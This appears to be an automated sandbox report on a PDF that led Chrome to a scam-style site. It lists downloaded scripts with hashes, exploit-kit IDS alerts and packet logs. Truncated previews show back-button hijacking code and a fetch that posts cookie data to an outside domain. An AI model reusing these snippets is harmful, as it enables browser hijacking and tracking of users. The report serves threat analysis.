                                                                                                          SHA-512:1D7B06B904E2CAB0C1002389AAEC5EC31A90CD127B7EED7E8BAE97B4A07D4E4103D102C034469AB7B6302DB3E5D99BEE9A28348792CBBF73982520F10A5C436E
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47420],{50656:function(e,n,t){t.d(n,{N:function(){return v}});var r=t(12139),i=t(61656),o=t(83216),a=t(71961),s=t(35147),u=t(21818),c=t(51659),l=t(94397),d=t(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],v=function(){var e=(0,r.useState)(0),n=e[0],t=e[1],v=(0,r.useState)(!1),p=v[0],b=v[1],h=(0,d.bp)().state,m=h.oaid,w=h.userData,g=h.passParamToParams,y=h.userAgentData,E=w.subId,k=y.data.platformVersion,I=(0,l.k)(k);(0,r.useEffect)((function(){b(function(){var e=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(e)}())}),[]),(0,r.useEffect)((function(){var e=setInterval((function(){t(0)}),1e4);return function(){return clearInterval(e)}}),[]);return{initBack:function(e){var r;if(h.back.isEnabled)if(n>12&&p)(0,a.yN)("initBack: Too much pushStateToHistory");else{var l,d,v,b,w=null!==(l=h.back.historyTimeAmount)&&void 0!==l?l:3,y=null===(r=h.back.zones)||void 0===r?void 0:r.find((function(e){r
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1253), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1253
                                                                                                          Entropy (8bit):5.346174453820216
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Z8cMKEnwSyqYrhHy1OOyXoNHwiVJqAp2FV:JEnBYBOy4iiyUs
                                                                                                          MD5:EDF2D26EEAE995D575A1633132132983
                                                                                                          SHA1:D7A1EEB699E800F9F69D76A1A5425825201868FF
                                                                                                          SHA-256:F493BEB840B7CD4B91E7613E05E25EE3634988B510C1199E846ABFA2750FEBF9
                                                                                                          SHA-512:48A8A7E5A2067B308F335E54C10EE773D9B0ADD2E5FFAEE8605B4D11199A28228B0F1F389AAA7D56086E5858623AE0C86C91EC250616FDE47CF2C94420DEB6F0
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js
                                                                                                          Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/407da83598ea2235-1736072686539-13288ea094322088.js"],"/404":["static/chunks/230792267814e39d-1736072686539-db36d95ae68fb7a1.js"],"/_error":["static/chunks/a36867e63359bbb9-1736072686539-4dc46aa924ea7180.js"],"/article/[id]":["static/chunks/0c51ac0c16ed4101-1736072686539-d2cdc237bddcf0bb.js","static/chunks/0c3a4dbdeb5a7b21-1736072686539-805a97de1d320c47.js"],"/back":["static/chunks/83b9c7ce75a0e28f-1736072686539-568c3335b1064321.js"],"/cookie":["static/chunks/fe787fe57a3bfdb3-1736072686539-ba4ecb61feb00f90.js"],"/privacy-policy":["static/chunks/470ac8bc3d32ab50-1736072686539-3dce3a19f603ab40.js"],"/push-opt-out":["static/chunks/05fcdf2f9e647203-1736072686539-6b40832bacb02c13.js"],"/terms":["static/chunks/de53a2e1559aef61-1736072686539-d65d75189a797d23.js"],"/[landingName]/[configId]/[[...slug]]":["static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js","static/chunks/f11a4c03247183
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):160
                                                                                                          Entropy (8bit):5.090984031481258
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:k0WYL12AoJTRXCGW045A9CNo06yBMfOVB+MB44W6QfpX/W6Qen:UYR2AUTRMPArYH46EpXO6h
                                                                                                          MD5:D7C1624B8C3C5724789430E3EE0F99CD
                                                                                                          SHA1:F537B81DFB15B4B4C8C48EDB112CA607563AE8E0
                                                                                                          SHA-256:3064462069623E8EE6A6F553B03B85AF446F6A83797C5B7DF5AB4745B3E7DAC1
                                                                                                          SHA-512:F4C6DBD513B6165E515DF0654A8D9D91F42DC6B6BC4100EF8174BDA8211A48F13319B8A51C98F0EBCAF5D07C634E3D1E20337DD8521C679102548ADE5A2B8274
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js
                                                                                                          Preview:self.__SSG_MANIFEST=new Set(["\u002F[landingName]\u002F[configId]\u002F[[...slug]]","\u002Farticle\u002F[id]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25
                                                                                                          Entropy (8bit):3.6234651896016468
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YWR4brk7VBn:YWybrm
                                                                                                          MD5:D3D22A2C483EA5BF5E1B887D19B710E9
                                                                                                          SHA1:31E5F0A94EAC2CCFF4801AA97255701460C3C078
                                                                                                          SHA-256:4C7BF259CF71E49AA671EA413172DA39DCD72C8B7E34948C01E21F5585370602
                                                                                                          SHA-512:85EF64BF19C397B0F34DDF055AA27F732078C8DACE8DAAA3AE3BC9D50B81453C3621EA936FAC49BF9F194CA9905717DD8BDEF9FCBDDE972FD099FB3C022714BE
                                                                                                          Malicious:false
                                                                                                          Preview:{"status":0,"error":1001}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (39130), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):39130
                                                                                                          Entropy (8bit):5.68842387001528
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:1allRuymFQHuiCmtlOy+r09J+Z8BmnFmM:iDoO5oFp
                                                                                                          MD5:A703AB68EE6001C79EB2E1F75A516BDE
                                                                                                          SHA1:4DA9CD4DFE7174EE962E337428FDA7F853EE5644
                                                                                                          SHA-256:13F6F5189D9DF680BE60617333534B58BABD3E06B06231C58AE9C3F17FFB537E
                                                                                                          SHA-512:8C362B35ADE5A49DC82460B6E92AF305CB3E850CD6931E70AC1FA8BE9DE032F548E7F80BE2675888DD49E7F43FC6ED85B8330727FD285AABAD6D689D6182B869
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[13701,77185,62811,90844,91707,9611,182,11085,69143,96944,72530,66553,45707,2464,1285,28796],{77185:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/coca-cola-pack-2.416beb0e.webp",height:128,width:200,blurDataURL:"data:image/webp;base64,UklGRmYAAABXRUJQVlA4WAoAAAAQAAAABwAABAAAQUxQSA0AAAABD/D8/4iIMP8R/Q8IAFZQOCAyAAAAsAEAnQEqCAAFAAJAOCUAToAhx34+gAD+dcmsrdhPPHRpXvD4HyTYrjetc6d4hxQgAAA=",blurWidth:8,blurHeight:5}},62811:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/coca-cola-pack.b35bceeb.webp",height:151,width:200,blurDataURL:"data:image/webp;base64,UklGRnYAAABXRUJQVlA4WAoAAAAQAAAABwAABQAAQUxQSA0AAAABD/D7/4iIMP8R/Q8QAFZQOCBCAAAAMAIAnQEqCAAGAAJAOCWcAnRH/4HooMTsjsAA/vSxL81s/6FfwTZUL5q/N+uz2E/4e4CkCOg3FhkJlRenhi0jgAAA",blurWidth:8,blurHeight:6}},90844:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/dollars-boy.33e06a2a.webp",height:155,width:207,blurDataURL:"data:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (43597), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43597
                                                                                                          Entropy (8bit):5.384195937245985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:cd/ZsIAklmYzhivaEZxNHpFCkVeVOcXJVA4CCVzCgR:+sBp0jsxJ3FVxcXJVAQ7R
                                                                                                          MD5:B50FEAF502124FE6E36A331A7A49B78F
                                                                                                          SHA1:C8B5F6E628F9730F4804BD6358D2F1C9359BF064
                                                                                                          SHA-256:9029CE95458EDE9AE338DC5E333033B4D5DA23108D7D12D1FAB12983D0F1D718
                                                                                                          SHA-512:9A7692B8C7CF065371C750309A4E782ECC2A90741362F48288E6E49C32F64DB8311C6951B031ED1037B7672E4A6763266D7379FCC571E21B78BBEE002CDD29D3
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{13421:function(e,r){"use strict";r.parse=function(e,r){if("string"!==typeof e)throw new TypeError("argument str must be a string");var t={},n=(r||{}).decode||o,i=0;for(;i<e.length;){var s=e.indexOf("=",i);if(-1===s)break;var u=e.indexOf(";",i);if(-1===u)u=e.length;else if(u<s){i=e.lastIndexOf(";",s-1)+1;continue}var c=e.slice(i,s).trim();if(void 0===t[c]){var l=e.slice(s+1,u).trim();34===l.charCodeAt(0)&&(l=l.slice(1,-1)),t[c]=a(l,n)}i=u+1}return t},r.serialize=function(e,r,o){var a=o||{},s=a.encode||i;if("function"!==typeof s)throw new TypeError("option encode is invalid");if(!n.test(e))throw new TypeError("argument name is invalid");var u=s(r);if(u&&!n.test(u))throw new TypeError("argument val is invalid");var c=e+"="+u;if(null!=a.maxAge){var l=a.maxAge-0;if(isNaN(l)||!isFinite(l))throw new TypeError("option maxAge is invalid");c+="; Max-Age="+Math.floor(l)}if(a.domain){if(!n.test(a.domain))throw new TypeError("option d
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2652
                                                                                                          Entropy (8bit):4.03430190928323
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hKQPXXvNekuSRtRtRxZFo0Fmsowke7EwiViZp+0piiXFDXFziViZp/XFDXFxjiVG:hKUF7Z1Fae7EwEi6KXXFDXFzEirXFDXZ
                                                                                                          MD5:00013844F5058C3D9B228F6BFD995569
                                                                                                          SHA1:3C9C13C8ABD170C1A288F2AF3A113843ABB701C0
                                                                                                          SHA-256:15E40D2556A41B58542367F158EA96C0949EB3FAFECF930CF1A7653167910B9B
                                                                                                          SHA-512:FD53F7618B1BEA8B435040E17BA092692082C1ACDC0D8596C4D45CFE10DF77D6638D25E97BBAADFDCCB1CD94A69518FD2EF5060DCAE2E5E702FC00C181DC7DA6
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/media/icon-survey.86b78ce0.svg
                                                                                                          Preview:<svg height="512" width="512" xmlns="http://www.w3.org/2000/svg"><path fill="#fff" d="M445 167.364c4.143 0 7.5-3.357 7.5-7.5V107.5c0-12.406-10.094-22.5-22.5-22.5h-7.5V65c0-12.406-10.094-22.5-22.5-22.5h-7.5v-20C392.5 10.094 382.406 0 370 0H82C69.593 0 59.5 10.094 59.5 22.5v41.365c0 4.143 3.358 7.5 7.5 7.5s7.5-3.357 7.5-7.5V22.5c0-4.136 3.364-7.5 7.5-7.5h288c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5H82c-4.136 0-7.5-3.364-7.5-7.5V95.865c0-4.143-3.358-7.5-7.5-7.5s-7.5 3.357-7.5 7.5V404.5c0 12.406 10.093 22.5 22.5 22.5h7.5v20c0 12.406 10.093 22.5 22.5 22.5h7.5v20c0 12.406 10.093 22.5 22.5 22.5h288c12.406 0 22.5-10.094 22.5-22.5V191.679c0-4.143-3.357-7.5-7.5-7.5s-7.5 3.357-7.5 7.5V489.5c0 4.136-3.364 7.5-7.5 7.5H142c-4.136 0-7.5-3.364-7.5-7.5v-20h185.367c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5H112c-4.135 0-7.5-3.364-7.5-7.5v-20H370c12.406 0 22.5-10.094 22.5-22.5v-347h7.5c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5h-48.319c-4.143 0-7.5 3.357-7.5 7.5s3.357 7.5 7.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.82287529661584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrX2eD9lLjHCTTmuNoiJxHHNa8tNsAs+MZrtz8nwtd3HLWGIdiQLf:+dbjX2ehlLD8CCG8tFMttwEWVdiQT
                                                                                                          MD5:59CAEA6E1EDC6EDDFA247EBA648299D6
                                                                                                          SHA1:83F621C424229AF5F7FA879E955CD3717F16CB2F
                                                                                                          SHA-256:74A35FB066E72B0571D2DD046D91F3E74B735D18313E4A018233AE90FC4064D9
                                                                                                          SHA-512:9D6AD3A1FAF2ECCD53224D58BDEEC157A397737CD144A7E35A52F66E97015E59FAFA33475E64D76D8C29EED56F3966D58565C15441426B68B89FE9FEA5F801FD
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[21182],{21182:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_27.34e63576.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAACwAQCdASoIAAgAAkA4JQBOgCHXWSwAAMlSEqVecXa2MqnHGzlfaEcnMp9o4+GLY+uyW7EtQUW4PI7N+3gdtUkgiyRnnQ3fwAAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (379), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):379
                                                                                                          Entropy (8bit):5.845083836181435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrzf4J/eD9lLjwMsNoiJxHHNa8tNsoS57s0skl/OGOCTaH3JpHIdiQT:+dbjzfKehlLUjCCG8tJSl/OGOK23Judl
                                                                                                          MD5:6849AF83D4A45731B6328054CE82DBD3
                                                                                                          SHA1:E6E201092AAA24AE08312D40BD4344F9B751D10A
                                                                                                          SHA-256:ED758EBF60183601C319D0F351572BEA7E665A7553DE85DA1AD183CB1FEB5B32
                                                                                                          SHA-512:49C7054C8BE125573FD9B40698AF4F04033A86D10D13277094DFC720C1B2584D55E700260FBE65181237631D049462681411072017388852F79866BE6B1F2EF2
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[44066],{44066:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_1.ed283ef5.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAADwAQCdASoIAAgAAkA4JQBOgMUAyZYG2wAAyXKexwGcAPe06+0VQdWSHJhfPy+D1ef8t2z/WLs6jKhVZ2iNzJqKdZZtyxESc2gAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.835059888755953
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrmol44LtNQ3lLjqgHuNoiJxHHNaKtNRWha7sURSyhtPQNqJbsjYUcc:+dbjm9GtC3lLWvCCGs6Y1hVQEJbsjYzc
                                                                                                          MD5:5C716A3BFE6F7CF6CCBC6ED8F2254BCB
                                                                                                          SHA1:4B4D84170CA295DF77A69559CEE4759DBBC8B6C6
                                                                                                          SHA-256:B4E594E32FB1A3FF5B99EE993835A5C43CD14615C258E5CB90255FA3CBBFA35D
                                                                                                          SHA-512:2C3E0945B0721085F970DEDF54F9694952951B1647D5018B00115868B2B646432A208A0CEA7CB023EDD92E3F0A6B4D031F58BE25474794CAD7066D4ACBE14A91
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58440],{58440:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/f_14.3f9cde6f.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQCdASoIAAgAAkA4JQBOgMV47Zk4NHAA/mFjtO9tdHxWMdEvPxrwSrAdn5mjBL3BAmQUPTEaEGw8k9QdQvnsOZTS1FOsTk7EnftUAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14065), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14065
                                                                                                          Entropy (8bit):5.417986406521914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Nz0XHfZkkvJ4M7/ucgEwAzW4882lMY+vW7rAlD01GfAYXPct+E9OQO9UH8+SQBk8:N0X1x772AzZYT7r4D6TY/ct+kjOeY8
                                                                                                          MD5:F45DE52B71FFBAAB0AF7B835959FE830
                                                                                                          SHA1:7044C236F92EB3E1732ADFEB4BA7E9607204EDF3
                                                                                                          SHA-256:025E230CDBE76D6D9BDAC4B557C17599F9EB0A519BC7F7FFC216E44AFCD37DC2
                                                                                                          SHA-512:ECB83C6804B2802C2E602F5D943E70703750F3B07304A802E6021E065394475774A78DE05062D69F4E2E52DB9D3DB43845F44EEC26B39CA2E4CDA81A7A772F6B
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73557],{9097:function(n,i,e){e.d(i,{A:function(){return d}});var t=e(98788),o=e(42838),r=e(70865),a=e(96670),c=e(22970),s=e(29505),u=e(13923),l=e(71961),d=function(){var n=(0,t.Z)((function(n){var i,e,t,d,f,m,v,h,k,p;return(0,c.__generator)(this,(function(c){switch(c.label){case 0:i=n.cookiesForCheck,e=n.shouldKeepAlive,t=void 0!==e&&e,d=n.customCookieLifetime,f=i.map((function(n){var i=parseInt("604800",10);return(0,a.Z)((0,r.Z)({},n),{value:void 0!==n.value?n.value.toString():void 0,defaultTtl:i})})),(0,l.cM)("checkCrossDomainCookie - data to /sync-do: ".concat(JSON.stringify(f,null,2))),c.label=1;case 1:return c.trys.push([1,6,,7]),[4,fetch("".concat("https://forspearowor.com","/sync-do"),{method:"POST",cache:"no-cache",keepalive:t,credentials:"include",headers:{"Content-Type":"application/json"},body:JSON.stringify(f)})];case 2:return(m=c.sent()).ok?[3,4]:[4,m.text()];case 3:return v=c.sent(),console.error("check
                                                                                                          File type:PDF document, version 1.5
                                                                                                          Entropy (8bit):7.344830103647365
                                                                                                          TrID:
                                                                                                          • Adobe Portable Document Format (5005/1) 100.00%
                                                                                                          File name:AZfDGVWF68.pdf
                                                                                                          File size:68'041 bytes
                                                                                                          MD5:85ae7a9c76612dfad87fc1cac7259714
                                                                                                          SHA1:b6030d827cc3ee50badc1b24d908bea488c5f673
                                                                                                          SHA256:b24c416e0247cf131d4e8b634c712612bf35d0ee13fca05c62ff0534d273da28
                                                                                                          SHA512:6b774207fd60063d0b3a9b3020df7cf4d0b34bd673beadecfdc82cd9f0af2983a9b3cad4543d737df605a0694115c5cb5360bf525421e66a0f7c6242c1e04a5d
                                                                                                          SSDEEP:1536:ZsoaPd2TLstfsNj679iyNOM8+ramf+6h2u:SouR4js9dNOie6v
                                                                                                          TLSH:AB634A21FBEAE2C8DF87CEB8D47E2D335A0555C5169DD12F007F498A2184A769B073AC
                                                                                                          File Content Preview:%PDF-1.5.%.....2 0 obj.<<./Outlines 4 0 R./PageMode /UseOutlines./AcroForm 5 0 R./Pages 6 0 R./Type /Catalog./Lang (en-US)./Metadata 7 0 R.>>.endobj.7 0 obj.<<./Filter /FlateDecode./Type /Metadata./Subtype /XML./Length 485.>>.stream..x.}....0....S ..5..|`
                                                                                                          Icon Hash:62cc8caeb29e8ae0

                                                                                                          General

                                                                                                          Header:%PDF-1.5
                                                                                                          Total Entropy:7.344830
                                                                                                          Total Bytes:68041
                                                                                                          Stream Entropy:7.318908
                                                                                                          Stream Bytes:66085
                                                                                                          Entropy outside Streams:5.259073
                                                                                                          Bytes outside Streams:1956
                                                                                                          Number of EOF found:1
                                                                                                          Bytes after EOF:
                                                                                                          NameCount
                                                                                                          obj14
                                                                                                          endobj14
                                                                                                          stream12
                                                                                                          endstream12
                                                                                                          xref0
                                                                                                          trailer0
                                                                                                          startxref1
                                                                                                          /Page0
                                                                                                          /Encrypt0
                                                                                                          /ObjStm1
                                                                                                          /URI0
                                                                                                          /JS0
                                                                                                          /JavaScript0
                                                                                                          /AA0
                                                                                                          /OpenAction0
                                                                                                          /AcroForm1
                                                                                                          /JBIG2Decode0
                                                                                                          /RichMedia0
                                                                                                          /Launch0
                                                                                                          /EmbeddedFile0

                                                                                                          Image Streams

                                                                                                          IDDHASHMD5Preview
                                                                                                          243c9cd8f09e83e3fc3598d80718fbd50afc0d1300923432a3
                                                                                                          25c4e6e2d2d8f4e6da1db1f1878d970404ae28dcf184166954
                                                                                                          290000000000000000b0fe33561ccf0a28aea03e458c915153
                                                                                                          30e080e2eaeaeac0eada66480dec1758b3ac1e26d1f59608c1
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-06T12:09:11.150786+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.45004951.68.82.147443TCP
                                                                                                          2025-01-06T12:09:11.401249+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.45004851.68.82.147443TCP
                                                                                                          2025-01-06T12:09:12.641960+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.450052188.114.96.3443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 6, 2025 12:06:25.809191942 CET49675443192.168.2.4173.222.162.32
                                                                                                          Jan 6, 2025 12:06:49.546479940 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.546536922 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.546611071 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.547072887 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.547096968 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.547511101 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.547554016 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.547625065 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.547800064 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:49.547817945 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.107783079 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.108040094 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.108056068 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.109015942 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.109091043 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.109144926 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.109184980 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.109201908 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.110240936 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.110306025 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.110358000 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.110411882 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.110500097 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.110507965 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.111371994 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.111442089 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.164536953 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.164552927 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.164563894 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.206226110 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.303590059 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.303777933 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.303837061 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.304421902 CET49755443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.304433107 CET44349755162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.340528011 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.387340069 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.487289906 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.487366915 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.489366055 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.490926027 CET49756443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.490936995 CET44349756162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.514852047 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.514869928 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.514957905 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.520826101 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.520838976 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.521209955 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.521272898 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.521348953 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.521547079 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:50.521559954 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.094345093 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.094717979 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.094738007 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.095062971 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.095412970 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.095499039 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.095566988 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.096554995 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.096765041 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.096780062 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.097143888 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.097459078 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.097521067 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.097565889 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.138114929 CET49758443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.138115883 CET49759443192.168.2.4162.214.122.223
                                                                                                          Jan 6, 2025 12:06:51.138122082 CET44349758162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.138130903 CET44349759162.214.122.223192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.284517050 CET4976053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:51.289298058 CET53497601.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.289376020 CET4976053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:51.289438009 CET4976053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:51.289454937 CET4976053192.168.2.41.1.1.1
